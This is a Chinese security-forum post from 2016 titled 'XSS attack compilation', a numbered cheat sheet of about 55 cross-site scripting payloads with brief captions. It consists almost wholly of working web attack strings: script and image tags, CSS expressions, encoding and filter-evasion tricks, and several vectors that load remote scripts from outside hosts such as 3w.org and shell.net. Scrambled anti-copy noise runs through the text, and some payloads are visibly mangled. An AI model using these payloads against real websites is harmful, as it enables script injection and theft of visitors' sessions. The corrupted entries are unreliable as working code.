找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2493|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入
' l/ k- A8 Z, z9 [% T7 a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 |! V! ^8 i/ i  K! T4 @& D2 o
(99)另类弹框
) f! {7 `  G  \9 M, s
<q/oncut=alert()>1
. D$ w, s+ X: d& p) m# e<s/onclick=alert()>b
. L/ x/ X. Y& k& z2 T1 ` <XSS=" onclick="alert(1)//">clickme</SSX=">; n0 W- D* @. o* L3 Z/ |% V
<zzz onclick=alert`1`>clickme</zzz>
$ I6 r( _( j. _- k6 z <a onclick=alert`1`>clickme</a>. I. o% [- T4 v7 R6 T. b* ~9 _5 [
<a=">clickme</a=">
' q% t/ y5 ?3 c  @1 N+ `8 n; ]3 ?<a=">clickme</a>; K1 k+ F* y/ v  N0 T
<z=">clickme</z=">  i( Q, F5 H2 G. |2 v& a( b
<z onclick=alert`1`>clickme</z>' f- A2 R- A. ]# `* }

1 H. H4 H7 k7 J(2)IMG标签XSS使用JavaScript命令
8 d: _5 g# J% [7 R" Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ o8 K1 a' z9 N0 Q5 s

/ b+ j) c% ~& m; Y9 F+ W
(3)IMG标签无分号无引号! u3 f& n- I: v* i: U
<IMG SRC=javascript:alert(‘XSS’)>4 O& i' z0 w+ z1 f
& o8 C- {2 L4 y' x) b( D5 K
(4)IMG标签大小写不敏感
8 {- ^6 K' J0 B8 R1 P
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 Y. J; U$ L+ P9 G- s2 H
7 O% T5 n8 ~% N$ U
(5)HTML编码(必须有分号): u: s% [7 ^$ N, v3 L* X3 ~3 s- O' {' C
<IMG SRC=javascript:alert(“XSS”)>( ?* h7 o1 b/ ?
% n) m6 U8 Y- [
(6)修正缺陷IMG标签
% U( Y6 |) c- E. f) F3 l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' b* G4 d( u/ v0 |6 y
/ O5 L( Y& k) A0 l1 Q: B
(7)formCharCode标签(计算器)8 y; S- Y6 o) e9 O' I, N
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ ?) O# `1 c3 ?6 H$ _, U
% t* J3 P- ]6 D
(8)UTF-8的Unicode编码(计算器)! j. t4 d% Y  c; k0 l7 o  D
<IMG SRC=jav..省略..S')>
2 m; C8 g3 W0 d5 g/ S

7 ^6 `; T. h7 `6 \$ O: F7 H; T4 n
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, Y. C* z/ \' A5 }
<IMG SRC=jav..省略..S')>: f& B* w' w( n% ^& w- Z
, O' {* S$ j* s! ]
(10)十六进制编码也是没有分号(计算器)& F5 C4 C( \" x  g# A; U
<IMG SRC=\'#\'" /span>
% F: {- n; ^7 U' s1 t8 C+ R; Q) Z$ u7 v+ z
(11)嵌入式标签,将Javascript分开
' b/ U1 e2 C% j+ g: p5 v5 I<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 h: U& w5 |% X/ [" u3 G- X- ]/ Y4 M2 x3 S
(12)嵌入式编码标签,将Javascript分开0 J! E$ F) s  ^9 K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ F) V  z0 z1 |7 s
" M( c0 {& C; L$ S* e7 M0 @(13)嵌入式换行符
6 H* y4 F5 v4 [, Q& r<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; a. g$ j1 n. F- C
0 D& L4 H' T( |; Y  v/ v1 ^
(14)嵌入式回车
8 C1 A) y6 K# G6 H+ Z7 N' ]<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 l* W( H( O; o
& }' `  C2 K7 X2 A+ @# Z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# c5 e* o. G$ M  I# H. w
<IMG SRC=\'#\'" /span>+ \: X0 F2 H. f
4 {8 |; G, P& z1 c9 h
(16)解决限制字符(要求同页面)2 f+ c' F6 {/ i
<script>z=’document.’</script>
& R+ Z" q, H( G$ V& a<script>z=z+’write(“‘</script>6 q/ J7 V  F) C3 m& D
<script>z=z+’<script’</script>
+ R4 f/ b: ]3 w  K" `0 P<script>z=z+’ src=ht’</script>
' M7 N- s- }( J6 p+ X. i: g$ C<script>z=z+’tp://ww’</script>
1 R7 s. ^4 a; n/ @) j<script>z=z+’w.shell’</script>/ p6 f2 M" Y. ?/ X# u- W2 B, S
<script>z=z+’.net/1.’</script>
4 G: V* |  }/ Y<script>z=z+’js></sc’</script>
5 b" ~  T% y" p; |1 R( u8 Y7 j  V<script>z=z+’ript>”)’</script>+ U1 D* b4 s/ e3 D  z' {9 F7 S
<script>eval_r(z)</script>- V! [0 t8 Y- C3 v" z, y3 u* i

% Q6 |* |' M9 B(17)空字符
0 Q% j2 K5 J) A, Z6 q4 x$ Vperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 d. k& R) ?5 p; [( j6 r
0 x2 L) z. f3 ?, h) w6 F3 T
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 b+ [1 |6 D! H
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: [* q* g  T7 Z5 ^1 Z0 E
0 A3 y& a* ~* P: Z
(19)Spaces和meta前的IMG标签: o1 C) T% U2 J+ B9 `( L0 y
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
& y6 A' X9 `) I& U# \+ X& W/ j" u" m! {3 M, o
(20)Non-alpha-non-digit XSS7 o& Y* B+ e1 a: s3 k$ R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
" D& K9 r; b9 h( _. Y) c) U
) q3 O8 [8 T& D! O- L(21)Non-alpha-non-digit XSS to 2
& ]# h) N' f4 V. P! P1 e<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) [; U2 C/ k$ r' ]& y/ L

: ?  R- N1 P8 D" |3 r: p(22)Non-alpha-non-digit XSS to 33 N/ n- e, ]+ e, L' z
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>9 a! X0 O( o& o% Q8 l; E. f3 @6 }

  @0 `) v5 D7 Z0 S(23)双开括号! C( S0 g2 n  U$ E3 ]$ p3 }7 s
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ A% c# s3 A- u2 o4 L) t# R" N6 ?; p: G+ ?: G: }! f6 T
(24)无结束脚本标记(仅火狐等浏览器)& v  n/ C' i5 x: Y" L) J3 z" ~
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# Q5 l, M' v5 X8 j/ L
6 F2 N. B) {2 S" W(25)无结束脚本标记2
" @0 T( J9 ]& D6 r<SCRIPT SRC=//3w.org/XSS/xss.js>
$ F6 j/ M' u  S0 m2 o/ J
! F) ~' o0 p; A0 k(26)半开的HTML/JavaScript XSS
* e  P2 F* g. s) h2 {+ y<IMG SRC=\'#\'" /span>
% u) U6 E6 [4 t/ N1 z% ]) V
# L6 S. v8 }" \$ y8 f(27)双开角括号
  l( x" f' Z" j( O8 y! g<iframe src=http://3w.org/XSS.html <
( n% a, Z. v1 a0 j. l
  d* @. o: h2 `(28)无单引号 双引号 分号8 R. f& w7 c2 p1 ^$ a* Z. y9 q
<SCRIPT>a=/XSS/
5 [. |! q. ~7 ?6 F7 c4 Q1 S$ halert(a.source)</SCRIPT>
& O. S- F! n  F' y+ i" W/ a' h( W8 B# L  D$ V( b
(29)换码过滤的JavaScript
  U; ~9 X+ Z% H( M+ \( F2 N\”;alert(‘XSS’);//5 i+ K, J5 N0 O* V
, Q& g% l+ ^" j
(30)结束Title标签* W  M  m' s6 L/ ^, k/ c1 e+ y6 p
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* f5 w& I8 C( U/ c& d/ S
" t& a5 V- U! U# I3 Z* D% T8 X8 _3 k(31)Input Image
' M8 t$ D# C  a; s<INPUT SRC=\'#\'" /span>. ~! q4 b- ~8 V$ E

0 P4 \- c3 M" K8 F(32)BODY Image
  E# t& A  _( F0 D  u0 r8 }8 T<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 u/ N4 N9 I0 p, L8 N* r5 P! o/ H, w% R4 P% w1 M4 ?
(33)BODY标签. x( _6 w+ h. B. y3 h
<BODY(‘XSS’)>
1 z/ x- l" P- v7 m
( ~! C/ h/ g! \# V0 c; A/ {5 Z(34)IMG Dynsrc
6 W4 h& \+ Y; C! n& |<IMG DYNSRC=\'#\'" /span>
" J' z6 m. D4 ~7 D) a: }1 g5 l+ k/ r
(35)IMG Lowsrc
4 f; F# V' {! [2 [& y! l# y9 k<IMG LOWSRC=\'#\'" /span>
% e; Q: G  i! f# B4 E) ?0 Q) m+ H$ F& A) M
(36)BGSOUND
( A7 Y: _6 A6 f4 y8 i' y1 O<BGSOUND SRC=\'#\'" /span>
. w: I! m4 w# p1 s2 w
4 \' c) i( V, R+ f: X1 _(37)STYLE sheet
. \1 e) y5 Z/ ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 G/ y3 [3 d! L4 T& T: r4 n6 P4 Y3 K5 S" v5 k1 l0 \$ w4 ]" F
(38)远程样式表
5 t' G3 O/ _6 b! G9 o+ M<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 V2 r5 l# Q! j3 L! U; h, O# i

; B' u# K8 ]/ E) s$ k& Y(39)List-style-image(列表式)
7 a: Y3 ^" W: T, O0 L  X3 U<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 B# L% e4 p" A) P0 e$ P: Q0 ?* e& Y7 p
(40)IMG VBscript; l* n( L  h' Y" Y
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
3 v4 w" p( a( E& ]' J/ ?4 m" V7 n- M4 e& i! a3 v8 T( o: Q) n
(41)META链接url
+ b3 d6 d- v5 Y% i<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ s  N5 ~3 z* W% j! l7 X
* X7 m& j" t8 k3 M4 b
(42)Iframe0 e# F! x, e( Z; R. e3 o! s3 g
<IFRAME SRC=\'#\'" /IFRAME>
3 W& `. L' I7 q6 i1 U' O& W( z* s9 g$ w& T' t! I# `  t9 v
(43)Frame
" j9 J4 C7 R/ l7 G/ Z# ?' y3 B% Q<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
4 K8 ]! i" K' r3 O
) K& K! o% f; ?  P" N' g7 R& N(44)Table
! n" s% g5 D9 T4 _+ E' V9 }<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>7 h; h  D/ u( e" k, l+ I6 P/ V
8 C/ n/ Q5 o4 @  a0 Q& m0 |
(45)TD# N4 b+ K2 w; V6 q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 h( W+ `9 Z, R# R0 O/ \* L& {' [% K% n7 f% @& P
(46)DIV background-image9 v# |) g1 }& P( h6 X0 E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 o1 ~* i5 V; C; ?" H, B3 ~  a& o: |3 Y9 ?% H# b" ^0 u
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)' E  M1 Y% n" w3 t: B( l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 L/ t; x0 Q. [8 d% B$ F, X

$ x3 H* b4 X( c- n7 s8 [9 e(48)DIV expression$ O% M* Y" r2 t
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 t; ~* l0 ?" D; y
, \4 B2 e0 u; k# l, F& B
(49)STYLE属性分拆表达! R3 b+ i" Z9 y. k5 u
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ Y' o; O8 M+ ^1 R* m

; _; @( \3 t7 [6 G(50)匿名STYLE(组成:开角号和一个字母开头)
( s. T; n9 t: Y" Z( p. Q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& {5 N  T' N$ H" P
. v& a* |" E9 l4 w+ Q
(51)STYLE background-image( V$ [  o$ l* t; \
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>  d2 O. \* U% M2 p* m

& L: f; N# ^+ j# O: u(52)IMG STYLE方式
8 `# H# G6 d! I# `, qexppression(alert(“XSS”))’>( Q$ F3 X% U2 u% |- U( a1 R
( }6 c8 R) P; E1 l" J1 k
(53)STYLE background
& k' K1 e0 l8 v) [<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>4 l/ q8 m+ q  ~6 y  o/ K5 o

0 J; K, W; M* h" B% B(54)BASE: D$ U. Z& u* d/ `! P, ?
<BASE HREF=”javascript:alert(‘XSS’);//”>
  C) J, c! y+ \" r1 P# s" g" d+ n7 s% B+ I  D* v7 s/ ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 b& X8 q: U$ G% ?
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
) F8 X) U* ^/ R8 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表